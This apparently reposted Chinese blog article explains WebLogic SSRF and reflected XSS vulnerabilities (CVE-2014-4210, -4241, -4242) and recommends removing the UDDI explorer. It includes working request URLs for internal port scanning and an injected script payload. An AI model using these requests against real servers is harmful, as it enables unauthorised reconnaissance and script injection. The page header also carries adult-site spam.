日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

weblogic中ssrf漏洞修复_WebLogic SSRF 及漏洞修复

發布時間:2025/3/15 编程问答 29 豆豆
生活随笔 收集整理的這篇文章主要介紹了 weblogic中ssrf漏洞修复_WebLogic SSRF 及漏洞修复 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

SSRF漏洞,也稱為XSPA(跨站端口攻擊),問題存在于應用程序在加載用戶提供的URL時,沒能正確驗證服務器的響應,然后就反饋回了客戶端。攻擊者可以利用該漏洞繞過訪問限制(如防火墻),進而將受感染的服務器作為代理進行端口掃描,甚至訪問系統中的數據。

CVE-2014-4210, Server Side Request Forgery in SerachPublicRegistries.jsp 版本10.0.2,10.3.6

Oracle WebLogic web server即可以被外部主機訪問,同時也允許訪問內部主機。比如有一個jsp頁面SearchPublicReqistries.jsp,我們可以利用它進行攻擊,未經授權通過weblogic server連接任意主機的任意TCP 端口,可以能冗長的響應來推斷在此端口上是否有服務在監聽此端口。

下面是一個沒有服務監聽TCP 23端口的例子:

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?

operator=http://10.0.0.4:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&

selfor=Business+location&btnSubmit=Search

響應的片斷如下:

weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused

下面是一個有服務監聽TCP 23端口的例子:

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?

operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&

selfor=Business+location&btnSubmit=Search

響應片斷如下:

weblogic.uddi.client.structures.exception.XML_SoapException:

Received a response from url: http://10.0.0.4:22 which did not have a valid SOAP content-type: unknown/unknown.

可以利用這種功能來發現主機或對主機進行端口掃描。

CVE-2014-4241,Reflected Cross Site Scripting in SetupUDDIExploer.jsp 版本:10.0.2,10.3.6

用戶輸入映射到一個cookie值(有效期為1年!),這個值會以不安全的方式寫入到之后的響應里,暴露給用戶進行跨站腳本攻擊。

惡意的URL:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?

privateregistry=&setPrivateRegistryInquiry=Set+Search+URL 響應會為cookier變量的privateregistry設值,并把瀏覽器重定向到SetupUDDIExplorer.jsp頁面。

HTTP/1.1 302 Moved Temporarily

Location: https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp

Set-Cookie: privateinquiryurls=; expires=Saturday, 29-Nov-2014 08:00:27 GMT

Content-Length: 331

Content-Type: text/html;charset=UTF-8 重定向的請求為:

GET /uddiexplorer/SetupUDDIExplorer.jsp HTTP/1.1

Host: [vulnerablehost]

Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|

http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|

http://uddi.rte.microsoft.com/inquire!Microsoft|

http://services.xmethods.net/glue/inquire/uddi!XMethods|;

privateinquiryurls=;

privatepublishurls=http://[vulnerablehost]:8080/uddi/uddilistener;

consumer_display=HOME_VERSION%3d1%26FORGOT_BUTTON_ROLE%3d73;

cookie_check=yes; LANG=en_US%3BUS; navlns=0.0; 那么響應的片斷為(響應中包含了cookie值:privateinquiryurls):

Private Registry:

Search URL:

Publish URL: http://[vulnerablehost]:8080/uddi/uddilistener

這類URL的例子:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?

privateregistry=&setPrivateRegistryInquiry=Set+Search+URL

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?

privateregistry=&setPrivateRegistryPublish=Set+Publish+URL

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?

publicregistryname=test&publicregistryurl=&addPublicRegistry=Add+Public+Registry+URL

CVE-2014-4242,Reflected Cross Site Scriping in consolejndi.portal 版本:10.0.2,10.3.6,12.1.1,12.1.2.0.0

控制臺應用試圖去管理Weblogic 應用服務器,正常是不被暴露的,它的攻擊目標是管理員。

這一類URL的例子1:

http://[vulnerablehost]:7001/console/consolejndi.portal?

_pageLabel=JNDIContextPageGeneral&_nfpb=true&JNDIContextPortlethandle=

com.bea.console.handles.JndiContextHandle("")

響應片斷:

Listing of entries found in context :

這一類URL2的例子:

http://[vulnerablehost]:7001/console/consolejndi.portal?

_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//

響應片斷:

document.write('

');

setBaseDirectory('/console/utils/JStree/images/');

setTaxonomyDelimeter('.');

{

_a = new TreeNode('server', null, 'myserver\u0027);

alert(4)//', '/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');

alert(1)//', 'images/spacer.gif', 'images/spacer.gif', null, 'myserver\u0027);alert(4)//', false, false);

修復建議:

1.如果業務不需要UDDI功能,就關閉這個功能。可以刪除uddiexporer文件夾,可以可在/weblogicPath/server/lib/uddiexplorer.war解壓后,注釋掉上面的jsp再打包。

總結

以上是生活随笔為你收集整理的weblogic中ssrf漏洞修复_WebLogic SSRF 及漏洞修复的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。